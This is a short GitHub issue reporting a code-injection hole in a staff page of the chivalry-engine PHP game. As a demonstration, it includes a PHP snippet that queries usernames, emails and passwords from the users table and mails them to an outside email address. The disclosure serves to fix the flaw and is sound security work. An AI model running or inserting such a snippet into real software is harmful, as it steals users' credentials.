Closed KyleMassacre closed 6 years ago
This line of code can be very dangerous the way it is used. If someone wanted to, and became a staff member, they could use any arbitrary code they wanted.
https://github.com/MasterGeneral156/chivalry-engine/blob/63b7bab8ead210868c62259f797d78a3ceba3262/upload/staff/staff_criminal.php#L201
For example:
$result = $db->fetch_row($db->query('select id, username, email, password from users'));
$body = '';
foreach ($result as $k => $v) {
    $body .= $v . " =\t" . $k[$v] . "\t";
}
mail('myemail@gmail.com', 'Hacked Results', $body);
This isn't even the worst case.